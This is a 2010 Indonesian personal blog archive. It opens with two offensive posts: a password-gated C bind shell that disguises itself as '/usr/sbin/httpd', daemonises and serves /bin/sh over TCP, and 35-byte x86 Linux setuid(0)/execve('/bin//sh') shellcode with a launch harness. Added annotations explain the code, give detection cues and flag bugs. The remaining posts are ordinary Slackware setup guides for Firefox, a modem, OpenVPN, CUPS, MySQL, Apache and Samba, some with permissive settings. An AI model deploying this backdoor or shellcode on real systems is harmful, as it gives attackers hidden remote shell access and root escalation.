Friday, July 16, 2010

Bindshell with password

Ngerti sendiri lah ini untuk apa. =))
/*
 * (original sourcenya lupa)
 * edited by zam
 * - Hotline -
 */


/* TCP port the listener in main() binds to (on every local address). */
#define PORT 1234
/* Value the client's first bytes are compared against; the literal shown
 * here looks masked by the author -- the real value is not on the page. */
#define PASS "******"
//#define PROMPT "hehe!\n"
/* Banner written to the client once the comparison in main() lets it through. */
#define SIP "[zam]-OK!\n"
#include <stdio.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

/*
 * File-scope state used by main(): soc_des is the listening socket, soc_cli
 * the accepted connection, soc_rc the last bind()/listen() result, soc_len
 * the client address length handed to accept(), server_pid the fork() result
 * and cli_pid the getpid() result (stored but not read in the code shown).
 */
int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid;
/* Local address the listener binds to, and the peer address filled in by accept(). */
struct sockaddr_in serv_addr; 
struct sockaddr_in client_addr;
/* Receives the bytes the client sends as the password; read() fills at most
 * sizeof(login) bytes and nothing appends a terminating NUL. */
char login[50];

/*
 * Password-gated bind shell, annotated for analysis and detection.
 *
 * In order, the code: zeroes every argv string and writes "/usr/sbin/httpd"
 * over argv[0]; binds a TCP socket to INADDR_ANY:PORT; forks twice with
 * setpgrp() and SIGHUP ignored in between; then loops on accept(), reads up
 * to sizeof(login) bytes, compares them with PASS and, if not rejected,
 * points fds 0-2 at the socket and execs /bin/sh.
 *
 * What a defender can look for: a process whose command line reads
 * /usr/sbin/httpd while its executable (on Linux, /proc/<pid>/exe) is some
 * other file, a TCP listener on PORT, and /bin/sh processes whose
 * stdin/stdout/stderr are a network socket.
 *
 * Never returns normally: every path ends in exit() or stays in the loop.
 * NOTE(review): <string.h>, <stdlib.h> and <unistd.h> are not included, so
 * memset/strlen/strcpy/strcmp/exit/fork/read/write are implicitly declared.
 */
int main (int argc, char *argv[])
{
 int i;
 /* Zero the contents of every argument string in place. */
 for(i=0;i<argc;i++) {
  memset(argv[i],'\x0',strlen(argv[i]));
 };
 /* Replace the process name with a web-server path. NOTE(review): strcpy()
  * does not check that the original argv[0] was at least this long, so the
  * copy can run past it into whatever follows in memory. */
 strcpy(argv[0],"/usr/sbin/httpd");
 soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
 if (soc_des == -1) 
  exit(-1); 
 bzero((char *) &serv_addr, sizeof(serv_addr));
 serv_addr.sin_family = AF_INET; 
 /* INADDR_ANY: the listener is reachable on every local IPv4 address. */
 serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
 serv_addr.sin_port = htons(PORT);
 soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
 if (soc_rc != 0) 
  exit(-1);
 /* First fork: the launching process exits, the child carries on. */
 if (fork() != 0) 
  exit(0); 
 /* Own process group and SIGHUP ignored, then a second fork. */
 setpgrp();  
 signal(SIGHUP, SIG_IGN); 
 if (fork() != 0) 
  exit(0); 
 soc_rc = listen(soc_des, 5);
 if (soc_rc != 0) 
  exit(0); 
 while (1) { 
  /* NOTE(review): soc_len is an int; accept() expects a socklen_t pointer. */
  soc_len = sizeof(client_addr);
  soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, &soc_len);
  if (soc_cli < 0) 
   exit(0); 
  cli_pid = getpid(); 
  server_pid = fork(); 
  /* fork() is non-zero in the parent (and -1 on failure), so the process
   * that accepted the connection serves it; the new child falls through to
   * close(soc_cli) below and goes back to accept(). */
  if (server_pid != 0) { 
   //write(soc_cli, PROMPT, sizeof(PROMPT));
   /* Return value of read() is not checked. */
   read(soc_cli, login, sizeof(login));
   /* NOTE(review): strcmp() takes two arguments, so the third is not a length
    * limit. The connection is dropped only when the result is negative: this
    * is an ordering test, not an equality test, so the password does not
    * restrict access the way the post title suggests. Treat the listener as
    * open to whoever can reach the port. */
   if(strcmp(login, PASS, sizeof(PASS)) < 0)
    exit(0);
   /* sizeof(SIP) includes the string's terminating NUL byte. */
   write(soc_cli, SIP, sizeof(SIP));
   /* stdin, stdout and stderr all become the client socket. */
   dup2(soc_cli,0); 
   dup2(soc_cli,1); 
   dup2(soc_cli,2);
   execl("/bin/sh","sh",(char *)0); 
   /* Reached only if execl() fails. */
   close(soc_cli); 
   exit(0); 
  }
  close(soc_cli);
 }
}

Saturday, July 10, 2010

Setuid(0) && execve("/bin//sh",0,0) shellcode

Ini didapat dari hasil baca saja; inti dari kode ini yaitu eksekusi shellcode. Apabila shellcode ini masuk ke dalam buffer program yang sedang berjalan kemudian tereksekusi, maka akan dihasilkan sebuah shell di dalam sistem, yang dapat digunakan untuk mengeksekusi perintah-perintah di sistem tempat program tersebut dijalankan.
// 35 bytes

/*
 * 35 bytes of 32-bit x86 machine code for Linux; the per-line comments are
 * its AT&T-syntax disassembly. It issues two `int $0x80` system calls:
 * number 0x17 with ebx = 0, then number 0x0b with ebx pointing at the string
 * "/bin//sh" built on the stack and ecx = edx = 0. On i386 Linux those
 * numbers are setuid and execve, matching the post title:
 * setuid(0), then execve("/bin//sh", 0, 0).
 *
 * setuid(0) only succeeds when the process that runs these bytes already
 * holds the privilege to switch to uid 0.
 *
 * Detection note: the two pushes that spell "//sh" and "/bin"
 * (68 2f 2f 73 68 68 2f 62 69 6e) followed by `int $0x80` are a long-known
 * pattern that network and host signatures match on.
 */
char shellcode[]=
"\x31\xc0"                      //xor    %eax,%eax
"\x31\xdb"                      //xor    %ebx,%ebx
"\x31\xc9"                      //xor    %ecx,%ecx
"\x31\xd2"                      //xor    %edx,%edx
"\xb0\x17"                      //mov    $0x17,%al      -- system call number 0x17
"\x31\xdb"                      //xor    %ebx,%ebx      -- first argument = 0
"\xcd\x80"                      //int    $0x80
"\xb0\x0b"                      //mov    $0xb,%al       -- system call number 0x0b
"\x53"                          //push   %ebx           -- zero dword terminates the string
"\x68\x2f\x2f\x73\x68"          //push   $0x68732f2f    -- "//sh"
"\x68\x2f\x62\x69\x6e"          //push   $0x6e69622f    -- "/bin"
"\x89\xe3"                      //mov    %esp,%ebx      -- ebx = address of "/bin//sh"
"\x31\xc9"                      //xor    %ecx,%ecx      -- second argument = 0
"\x31\xd2"                      //xor    %edx,%edx      -- third argument = 0
"\xcd\x80";                     //int    $0x80

/*
 * Test harness: treats the address of the shellcode array as a function
 * taking no arguments and calls it.
 *
 * shellcode is an ordinary initialized data array, so on systems that map
 * data pages non-executable (NX/DEP) the call faults instead of running the
 * bytes. NOTE(review): converting an object pointer to a function pointer is
 * not defined by ISO C, and main has no return statement.
 */
int main(void)
{
 (*(void(*)()) shellcode)();
}

Tuesday, July 6, 2010

Combining "rox-filer" with "firefox"



Ketika anda benar-benar ingin menggunakan window manager yang minimalis seperti yang "box-box" itu, mungkin anda akan menemukan permasalahan yang sama, yaitu tidak dapat melakukan "Open download folder" secara langsung melalui klik kanan download managernya firefox. Berikut ini merupakan cara yang saya pakai (sesuai dengan penalaran saya sendiri) untuk mengatasi hal di atas :

1. create file "~/.mozilla/firefox/rox.sh"

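#!/bin/sh
# rox launcher for firefox
# by : zam a.k.a. s3m
#
# Usage: rox.sh <path-or-URI>
# Firefox starts this helper with the download location as $1 and the script
# hands it to "rox -U". Exits with status 65 when no argument is given;
# otherwise the exit status is that of rox.
if [ -z "$1" ]
then
 exit 65
fi

# The argument comes from the browser (a downloaded file's name or folder),
# so it must be quoted: an unquoted $1 is word-split and glob-expanded, and a
# path containing spaces or wildcard characters would reach rox as several
# arguments instead of one.
/usr/bin/rox -U "$1"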

2. chmod file "~/.mozilla/firefox/rox.sh"

zam@darkstar$ chmod +x ~/.mozilla/firefox/rox.sh

3. edit file "~/.mozilla/firefox/xxxxxxxx.default/mimeTypes.rdf"
Bagian terpenting yang di edit adalah :
  
                   NC:prettyName="rox"
                   NC:path="~/.mozilla/firefox/rox.sh" />

Berikut Keseluruhan isi file :
<?xml version="1.0"?>
<RDF:RDF xmlns:NC="http://home.netscape.com/NC-rdf#"
         xmlns:RDF="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
  <RDF:Description RDF:about="urn:scheme:handler:mailto"
                   NC:alwaysAsk="true">
    <NC:possibleApplication RDF:resource="urn:handler:web:http://compose.mail.yahoo.com/?To=%s"/>
    <NC:possibleApplication RDF:resource="urn:handler:web:https://mail.google.com/mail/?extsrc=mailto&url=%s"/>
    <NC:possibleApplication RDF:resource="urn:handler:local:/usr/bin/thunderbird"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:scheme:rtsp"
                   NC:value="rtsp">
    <NC:handlerProp RDF:resource="urn:scheme:handler:rtsp"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:mimetype:handler:application/x-bzip2"
                   NC:alwaysAsk="true"
                   NC:saveToDisk="true">
    <NC:externalApplication RDF:resource="urn:mimetype:externalApplication:application/x-bzip2"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:scheme:handler:mms"
                   NC:alwaysAsk="true">
    <NC:possibleApplication RDF:resource="urn:handler:local:/usr/bin/gnome-mplayer"/>
    <NC:possibleApplication RDF:resource="urn:handler:local:/usr/bin/mplayer"/>
    <NC:externalApplication RDF:resource="urn:scheme:externalApplication:mms"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:scheme:file"
                   NC:value="file">
    <NC:handlerProp RDF:resource="urn:scheme:handler:file"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:handler:web:https://mail.google.com/mail/?extsrc=mailto&url=%s"
                   NC:prettyName="GMail"
                   NC:uriTemplate="https://mail.google.com/mail/?extsrc=mailto&url=%s" />
  <RDF:Description RDF:about="urn:handler:local:~/.mozilla/firefox/rox.sh"
                   NC:prettyName="rox"
                   NC:path="~/.mozilla/firefox/rox.sh" />
  <RDF:Description RDF:about="urn:scheme:webcal"
                   NC:value="webcal">
    <NC:handlerProp RDF:resource="urn:scheme:handler:webcal"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:handler:local:/usr/bin/thunderbird"
                   NC:prettyName="thunderbird"
                   NC:path="/usr/bin/thunderbird" />
  <RDF:Description RDF:about="urn:handler:web:https://www.mibbit.com/?url=%s"
                   NC:prettyName="Mibbit"
                   NC:uriTemplate="https://www.mibbit.com/?url=%s" />
  <RDF:Description RDF:about="urn:mimetype:text/x-sh"
                   NC:value="text/x-sh"
                   NC:editable="true"
                   NC:description="shell script">
    <NC:handlerProp RDF:resource="urn:mimetype:handler:text/x-sh"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:mimetype:handler:text/x-csrc"
                   NC:alwaysAsk="true"
                   NC:saveToDisk="true">
    <NC:externalApplication RDF:resource="urn:mimetype:externalApplication:text/x-csrc"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:scheme:handler:webcal"
                   NC:alwaysAsk="true">
    <NC:possibleApplication RDF:resource="urn:handler:web:http://30boxes.com/external/widget?refer=ff&url=%s"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:handler:local:/usr/bin/mplayer"
                   NC:prettyName="mplayer"
                   NC:path="/usr/bin/mplayer" />
  <RDF:Description RDF:about="urn:scheme:handler:irc"
                   NC:alwaysAsk="true">
    <NC:possibleApplication RDF:resource="urn:handler:web:https://www.mibbit.com/?url=%s"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:handler:web:http://compose.mail.yahoo.com/?To=%s"
                   NC:prettyName="Yahoo! Mail"
                   NC:uriTemplate="http://compose.mail.yahoo.com/?To=%s" />
  <RDF:Description RDF:about="urn:scheme:handler:ircs"
                   NC:alwaysAsk="true">
    <NC:possibleApplication RDF:resource="urn:handler:web:https://www.mibbit.com/?url=%s"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:scheme:externalApplication:rtsp"
                   NC:prettyName="mplayer"
                   NC:path="/usr/bin/mplayer" />
  <RDF:Description RDF:about="urn:mimetype:application/zip"
                   NC:value="application/zip"
                   NC:editable="true"
                   NC:description="Zip archive">
    <NC:handlerProp RDF:resource="urn:mimetype:handler:application/zip"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:handler:local:/usr/bin/gnome-mplayer"
                   NC:prettyName="gnome-mplayer"
                   NC:path="/usr/bin/gnome-mplayer" />
  <RDF:Description RDF:about="urn:mimetype:handler:audio/mpeg3"
                   NC:alwaysAsk="true"
                   NC:saveToDisk="true">
    <NC:externalApplication RDF:resource="urn:mimetype:externalApplication:audio/mpeg3"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:mimetype:audio/mpeg3"
                   NC:value="audio/mpeg3"
                   NC:editable="true"
                   NC:description="">
    <NC:handlerProp RDF:resource="urn:mimetype:handler:audio/mpeg3"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:mimetype:handler:application/x-java-archive"
                   NC:alwaysAsk="true"
                   NC:saveToDisk="true">
    <NC:externalApplication RDF:resource="urn:mimetype:externalApplication:application/x-java-archive"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:mimetype:handler:application/x-gzip"
                   NC:alwaysAsk="true"
                   NC:saveToDisk="true">
    <NC:externalApplication RDF:resource="urn:mimetype:externalApplication:application/x-gzip"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:scheme:handler:rtsp"
                   NC:alwaysAsk="true">
    <NC:possibleApplication RDF:resource="urn:handler:local:/usr/bin/mplayer"/>
    <NC:possibleApplication RDF:resource="urn:handler:local:/usr/bin/xine"/>
    <NC:possibleApplication RDF:resource="urn:handler:local:/usr/bin/gxine"/>
    <NC:externalApplication RDF:resource="urn:scheme:externalApplication:rtsp"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:handler:local:/usr/bin/xine"
                   NC:prettyName="xine"
                   NC:path="/usr/bin/xine" />
  <RDF:Description RDF:about="urn:mimetype:handler:text/x-sh"
                   NC:alwaysAsk="true"
                   NC:saveToDisk="true">
    <NC:externalApplication RDF:resource="urn:mimetype:externalApplication:text/x-sh"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:schemes">
    <NC:Protocol-Schemes RDF:resource="urn:schemes:root"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:scheme:mms"
                   NC:value="mms">
    <NC:handlerProp RDF:resource="urn:scheme:handler:mms"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:scheme:externalApplication:file"
                   NC:prettyName="rox"
                   NC:path="~/.mozilla/firefox/rox.sh" />
  <RDF:Description RDF:about="urn:mimetypes">
    <NC:MIME-types RDF:resource="urn:mimetypes:root"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:mimetype:application/x-gzip"
                   NC:value="application/x-gzip"
                   NC:editable="true"
                   NC:description="Gzip archive">
    <NC:handlerProp RDF:resource="urn:mimetype:handler:application/x-gzip"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:handler:local:/usr/bin/gxine"
                   NC:prettyName="gxine"
                   NC:path="/usr/bin/gxine" />
  <RDF:Description RDF:about="urn:mimetype:handler:application/zip"
                   NC:alwaysAsk="true"
                   NC:saveToDisk="true">
    <NC:externalApplication RDF:resource="urn:mimetype:externalApplication:application/zip"/>
  </RDF:Description>
  <RDF:Seq RDF:about="urn:schemes:root">
    <RDF:li RDF:resource="urn:scheme:mailto"/>
    <RDF:li RDF:resource="urn:scheme:irc"/>
    <RDF:li RDF:resource="urn:scheme:ircs"/>
    <RDF:li RDF:resource="urn:scheme:webcal"/>
    <RDF:li RDF:resource="urn:scheme:file"/>
    <RDF:li RDF:resource="urn:scheme:rtsp"/>
    <RDF:li RDF:resource="urn:scheme:mms"/>
  </RDF:Seq>
  <RDF:Seq RDF:about="urn:mimetypes:root">
    <RDF:li RDF:resource="urn:mimetype:application/x-gzip"/>
    <RDF:li RDF:resource="urn:mimetype:audio/mpeg3"/>
    <RDF:li RDF:resource="urn:mimetype:application/zip"/>
    <RDF:li RDF:resource="urn:mimetype:application/x-java-archive"/>
    <RDF:li RDF:resource="urn:mimetype:text/x-csrc"/>
    <RDF:li RDF:resource="urn:mimetype:application/x-bzip2"/>
    <RDF:li RDF:resource="urn:mimetype:text/x-sh"/>
  </RDF:Seq>
  <RDF:Description RDF:about="urn:scheme:irc"
                   NC:value="irc">
    <NC:handlerProp RDF:resource="urn:scheme:handler:irc"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:scheme:handler:file"
                   NC:alwaysAsk="false">
    <NC:externalApplication RDF:resource="urn:scheme:externalApplication:file"/>
    <NC:possibleApplication RDF:resource="urn:handler:local:~/.mozilla/firefox/rox.sh"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:scheme:mailto"
                   NC:value="mailto">
    <NC:handlerProp RDF:resource="urn:scheme:handler:mailto"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:scheme:ircs"
                   NC:value="ircs">
    <NC:handlerProp RDF:resource="urn:scheme:handler:ircs"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:mimetype:application/x-bzip2"
                   NC:value="application/x-bzip2"
                   NC:editable="true"
                   NC:description="Bzip archive">
    <NC:handlerProp RDF:resource="urn:mimetype:handler:application/x-bzip2"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:mimetype:application/x-java-archive"
                   NC:value="application/x-java-archive"
                   NC:editable="true"
                   NC:description="Java Archive">
    <NC:handlerProp RDF:resource="urn:mimetype:handler:application/x-java-archive"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:handler:web:http://30boxes.com/external/widget?refer=ff&url=%s"
                   NC:prettyName="30 Boxes"
                   NC:uriTemplate="http://30boxes.com/external/widget?refer=ff&url=%s" />
  <RDF:Description RDF:about="urn:root"
                   NC:en-US_defaultHandlersVersion="3" />
  <RDF:Description RDF:about="urn:scheme:externalApplication:mms"
                   NC:prettyName="gnome-mplayer"
                   NC:path="/usr/bin/gnome-mplayer" />
  <RDF:Description RDF:about="urn:mimetype:text/x-csrc"
                   NC:value="text/x-csrc"
                   NC:editable="true"
                   NC:description="C source code">
    <NC:handlerProp RDF:resource="urn:mimetype:handler:text/x-csrc"/>
  </RDF:Description>
</RDF:RDF>

4. restart firefox and download some file, then try "Open" or "Open containing folder" menu ;).

Friday, July 2, 2010

Zte ac2726 + smart + slackware 13.0

cara ini merupakan penyederhanaan dari cara sebelumnya http://4s3m.blogspot.com/2010/01/zte-ac2726-slackware-130.html

1. download and install latest "usb_modeswitch" package, and modem will be detected like this:



2. create file "/etc/ppp/peers/smart"

hide-password
noauth
asyncmap 0
modem
proxyarp
noipx
persist
idle 1000000
connect "/usr/sbin/chat -v -f /etc/ppp/peers/smartconnect"
debug
ttyUSB0
921600
defaultroute
noipdefault
user "smart"
remotename smart
ipparam smart
crtscts
lock
usepeerdns

3. create file "/etc/ppp/peers/smartconnect"

ABORT BUSY
ABORT 'NO CARRIER'
ABORT VOICE
ABORT 'NO DIALTONE'
ABORT 'NO DIAL TONE'
ABORT 'NO ANSWER'
ABORT DELAYED
'' "AT"
'OK' "ATQ0V1E0"
'OK' "ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0"
OK-AT-OK "ATDT#777"
CONNECT \d\c

4. run pppd to connect

root@darkstar# pppd call smart

Free with OpenVPN

OpenVPN package has been installed.

1. generate the certificate authority

root@glowstar# cd /usr/share/doc/openvpn/examples/easy-rsa/2.0
root@glowstar# source ./vars
root@glowstar# ./clean-all
root@glowstar# ./build-ca

2. create the server and client keys

root@glowstar# ./build-key-server server
root@glowstar# ./build-key client

3. generate the diffie-hellman parameters

root@glowstar# ./build-dh

4. create /etc/openvpn/server.conf

# OpenVPN server: routed (tun) VPN on UDP 443, clients addressed from 10.8.0.0/24.
# 74.x.x.x is the author's redacted public address.
local 74.x.x.x
port 443
proto udp
dev tun
# The CA certificate, server certificate and server private key are read
# straight from the easy-rsa working directory under /usr/share/doc.
# NOTE(review): server.key (and the ca.key that build-ca leaves in the same
# keys/ directory) must be readable by root only; check the permissions of
# that directory, or move the key material somewhere like /etc/openvpn.
ca /usr/share/doc/openvpn/examples/easy-rsa/2.0/keys/ca.crt
cert /usr/share/doc/openvpn/examples/easy-rsa/2.0/keys/server.crt
key /usr/share/doc/openvpn/examples/easy-rsa/2.0/keys/server.key 
# NOTE(review): 1024-bit Diffie-Hellman parameters are considered too weak
# today; generate at least 2048 bits (KEY_SIZE in easy-rsa's vars file) and
# point dh at the resulting file.
dh /usr/share/doc/openvpn/examples/easy-rsa/2.0/keys/dh1024.pem
server 10.8.0.0 255.255.255.0
ifconfig-pool-persist ipp.txt
push "route 10.8.0.0 255.255.255.0"
# redirect-gateway sends all client traffic through this server, and the
# pushed DNS option sends client lookups to the listed resolver.
# NOTE(review): confirm 208.68.222.222 is the resolver you intend; clients
# will trust whatever it answers.
push "redirect-gateway"
push "dhcp-option DNS 208.68.222.222"
keepalive 10 120
comp-lzo
persist-key
persist-tun
status openvpn-status.log
verb 3
# NOTE(review): this file sets no tls-auth key, no user/group privilege drop
# and no explicit cipher, so the daemon keeps running as root (step 5 starts
# it as root) with the build's default cipher.

5. start OpenVPN server

root@glowstar# openvpn /etc/openvpn/server.conf

6. copy these files to the client computer (client.key is a private key, so transfer it over a secure channel such as scp):

/usr/share/doc/openvpn/examples/easy-rsa/2.0/keys/ca.crt
/usr/share/doc/openvpn/examples/easy-rsa/2.0/keys/client.crt
/usr/share/doc/openvpn/examples/easy-rsa/2.0/keys/client.key 

7. create client.conf

# OpenVPN client matching the server.conf above: UDP to 74.x.x.x:443 over a
# tun device, authenticating with client.crt/client.key against ca.crt.
# NOTE(review): as written the client accepts any peer certificate signed by
# ca.crt, including another client's certificate. Adding
# "remote-cert-tls server" (or "ns-cert-type server" on older builds) makes it
# insist on a certificate issued for server use.
client
dev tun
proto udp
remote 74.x.x.x 443
resolv-retry infinite
nobind
persist-key
persist-tun
ca ca.crt
cert client.crt
key client.key
comp-lzo
verb 3

8. load module "tun" and connect to server

root@darkstar# /sbin/modprobe tun
root@darkstar# openvpn client.conf

9. if connected it will be like this:



10. try ping the server



11. now, maybe you can create an ssh connection? ;)

Thursday, July 1, 2010

Printing service S13

1. set executable rc.cups
root@dakrstar# chmod +x /etc/rc.d/rc.cups

2. run print server
root@dakrstar# /etc/rc.d/rc.cups start

3. open administration page
# http://localhost:631/

Setting mysqld S13

1. create db
root@darkstar# mysql_install_db --user=mysql

2. set executable rc.mysqld
root@dakrstar# chmod +x /etc/rc.d/rc.mysqld

3. run mysql server
root@darkstar# /etc/rc.d/rc.mysqld start

4. run secure installation
root@darkstar# mysql_secure_installation

Setting httpd S13

1. edit /etc/httpd/httpd.conf
###############################
# simple httpd.conf
###############################
ServerRoot "/usr"
Listen 80
LoadModule authn_file_module lib/httpd/modules/mod_authn_file.so
LoadModule authn_dbm_module lib/httpd/modules/mod_authn_dbm.so
LoadModule authn_anon_module lib/httpd/modules/mod_authn_anon.so
LoadModule authn_dbd_module lib/httpd/modules/mod_authn_dbd.so
LoadModule authn_default_module lib/httpd/modules/mod_authn_default.so
LoadModule authn_alias_module lib/httpd/modules/mod_authn_alias.so
LoadModule authz_host_module lib/httpd/modules/mod_authz_host.so
LoadModule authz_groupfile_module lib/httpd/modules/mod_authz_groupfile.so
LoadModule authz_user_module lib/httpd/modules/mod_authz_user.so
LoadModule authz_dbm_module lib/httpd/modules/mod_authz_dbm.so
LoadModule authz_owner_module lib/httpd/modules/mod_authz_owner.so
LoadModule authnz_ldap_module lib/httpd/modules/mod_authnz_ldap.so
LoadModule authz_default_module lib/httpd/modules/mod_authz_default.so
LoadModule auth_basic_module lib/httpd/modules/mod_auth_basic.so
LoadModule auth_digest_module lib/httpd/modules/mod_auth_digest.so
LoadModule file_cache_module lib/httpd/modules/mod_file_cache.so
LoadModule cache_module lib/httpd/modules/mod_cache.so
LoadModule disk_cache_module lib/httpd/modules/mod_disk_cache.so
LoadModule mem_cache_module lib/httpd/modules/mod_mem_cache.so
LoadModule dbd_module lib/httpd/modules/mod_dbd.so
LoadModule dumpio_module lib/httpd/modules/mod_dumpio.so
LoadModule reqtimeout_module lib/httpd/modules/mod_reqtimeout.so
LoadModule ext_filter_module lib/httpd/modules/mod_ext_filter.so
LoadModule include_module lib/httpd/modules/mod_include.so
LoadModule filter_module lib/httpd/modules/mod_filter.so
LoadModule substitute_module lib/httpd/modules/mod_substitute.so
LoadModule deflate_module lib/httpd/modules/mod_deflate.so
LoadModule ldap_module lib/httpd/modules/mod_ldap.so
LoadModule log_config_module lib/httpd/modules/mod_log_config.so
LoadModule log_forensic_module lib/httpd/modules/mod_log_forensic.so
LoadModule logio_module lib/httpd/modules/mod_logio.so
LoadModule env_module lib/httpd/modules/mod_env.so
LoadModule mime_magic_module lib/httpd/modules/mod_mime_magic.so
LoadModule cern_meta_module lib/httpd/modules/mod_cern_meta.so
LoadModule expires_module lib/httpd/modules/mod_expires.so
LoadModule headers_module lib/httpd/modules/mod_headers.so
LoadModule ident_module lib/httpd/modules/mod_ident.so
LoadModule usertrack_module lib/httpd/modules/mod_usertrack.so
LoadModule unique_id_module lib/httpd/modules/mod_unique_id.so
LoadModule setenvif_module lib/httpd/modules/mod_setenvif.so
LoadModule version_module lib/httpd/modules/mod_version.so
LoadModule proxy_module lib/httpd/modules/mod_proxy.so
LoadModule proxy_connect_module lib/httpd/modules/mod_proxy_connect.so
LoadModule proxy_ftp_module lib/httpd/modules/mod_proxy_ftp.so
LoadModule proxy_http_module lib/httpd/modules/mod_proxy_http.so
LoadModule proxy_scgi_module lib/httpd/modules/mod_proxy_scgi.so
LoadModule proxy_ajp_module lib/httpd/modules/mod_proxy_ajp.so
LoadModule proxy_balancer_module lib/httpd/modules/mod_proxy_balancer.so
#LoadModule ssl_module lib/httpd/modules/mod_ssl.so
LoadModule mime_module lib/httpd/modules/mod_mime.so
LoadModule dav_module lib/httpd/modules/mod_dav.so
LoadModule status_module lib/httpd/modules/mod_status.so
LoadModule autoindex_module lib/httpd/modules/mod_autoindex.so
LoadModule asis_module lib/httpd/modules/mod_asis.so
LoadModule info_module lib/httpd/modules/mod_info.so
LoadModule cgi_module lib/httpd/modules/mod_cgi.so
LoadModule dav_fs_module lib/httpd/modules/mod_dav_fs.so
LoadModule vhost_alias_module lib/httpd/modules/mod_vhost_alias.so
LoadModule negotiation_module lib/httpd/modules/mod_negotiation.so
LoadModule dir_module lib/httpd/modules/mod_dir.so
LoadModule imagemap_module lib/httpd/modules/mod_imagemap.so
LoadModule actions_module lib/httpd/modules/mod_actions.so
LoadModule userdir_module lib/httpd/modules/mod_userdir.so
LoadModule alias_module lib/httpd/modules/mod_alias.so
LoadModule rewrite_module lib/httpd/modules/mod_rewrite.so

<IfModule !mpm_netware_module>
<IfModule !mpm_winnt_module>
User nobody 
Group nogroup

</IfModule>
</IfModule>
ServerAdmin you@example.com
ServerName localhost
DocumentRoot "/home/zam/web/htdocs"
<Directory />
Options FollowSymLinks
AllowOverride None
Order deny,allow
Deny from all
</Directory>
# Document root, located inside a user's home directory.
# NOTE(review): this is a permissive combination. Indexes lists directory
# contents, ExecCGI and Includes allow CGI and server-side-include execution
# here (the mime_module section of this file maps .cgi and .pl to cgi-script),
# and AllowOverride All lets any .htaccess file placed under this tree change
# these settings. Anything able to write files into the tree can therefore
# get code run by the web server; keep only the options the site needs.
<Directory "/home/zam/web/htdocs">
Options Indexes FollowSymLinks ExecCGI Includes
AllowOverride All
Order allow,deny
Allow from all
</Directory>

<IfModule dir_module>
DirectoryIndex index.html index.html.var index.php index.php3 index.php4
</IfModule>
<FilesMatch "^\.ht">
Order allow,deny
Deny from all
Satisfy All
</FilesMatch>

ErrorLog "/var/log/httpd/error_log"
LogLevel warn

<IfModule log_config_module>
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined
LogFormat "%h %l %u %t \"%r\" %>s %b" common

<IfModule logio_module>
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %I %O" combinedio
</IfModule>
CustomLog "/var/log/httpd/access_log" common
</IfModule>

<IfModule alias_module>
ScriptAlias /cgi-bin/ "/srv/httpd/cgi-bin/"
</IfModule>

<IfModule cgid_module>
</IfModule>
<Directory "/srv/httpd/cgi-bin">
AllowOverride None
Options None
Order allow,deny
Allow from all
</Directory>
DefaultType text/plain

<IfModule mime_module>
TypesConfig /etc/httpd/mime.types
AddType application/x-compress .Z
AddType application/x-gzip .gz .tgz
AddHandler cgi-script .cgi .pl
AddType text/html .shtml
AddOutputFilter INCLUDES .shtml
</IfModule>
Include /etc/httpd/extra/httpd-multilang-errordoc.conf
Include /etc/httpd/extra/httpd-autoindex.conf
Include /etc/httpd/extra/httpd-default.conf
<IfModule ssl_module>
SSLRandomSeed startup builtin
SSLRandomSeed connect builtin
</IfModule>
Include /etc/httpd/mod_php.conf
###############################

2. set executable file rc.httpd
root@darkstar# chmod +x /etc/rc.d/rc.httpd

3. run httpd server
root@darkstar# /etc/rc.d/rc.httpd start

Setting samba S13

Berikut ini merupakan cara yang saya lakukan untuk melakukan file sharing pada linux slackware saya :

1. create file /etc/samba/smb.conf
##################
# smb.conf Created by zam
##################
[global]
workgroup = H3LL0L4M3RZ
server string = Hack Me
security = user

# Share "zam": exports /home/zam/smb read-write.
# NOTE(review): "public" is Samba's synonym for "guest ok". Where the server
# maps unauthenticated clients to the guest account, this share then accepts
# sessions without a password, and "writable = yes" lets them write into the
# directory. Set "public = no" if only the smbpasswd account created in step 4
# should have access.
[zam]
comment = sambaku
path = /home/zam/smb
public = yes 
writable = yes
user = zam
##################

2. create directory /home/zam/smb
zam@darkstar# mkdir /home/zam/smb

3. set executable rc.samba
root@darkstar# chmod +x /etc/rc.d/rc.samba

4. create password for samba user
root@darkstar# smbpasswd -a zam

5. run samba server
root@darkstar# /etc/rc.d/rc.samba start

Tuesday, June 22, 2010

Mounting remote file system

